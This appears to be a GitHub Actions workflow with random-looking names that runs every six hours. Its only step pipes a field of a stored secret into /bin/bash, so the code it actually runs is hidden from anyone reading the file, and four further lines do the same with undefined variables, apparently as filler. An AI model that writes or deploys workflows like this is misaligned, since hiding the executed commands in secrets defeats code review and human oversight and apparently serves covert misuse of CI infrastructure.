name: pengqi19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '52 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pengqi19871010
        env:
          oqy9177: ${{ secrets.oqy9177 }}
        run: |
          echo $oqy9177 | jq -r .ps68439 | /bin/bash
          echo $dw0 | jq -r .stkfm4 | /bin/bash
          echo $svq28 | jq -r .u868 | /bin/bash
          echo $d7 | jq -r .ld2908 | /bin/bash
          echo $ic3 | jq -r .s07 | /bin/bash

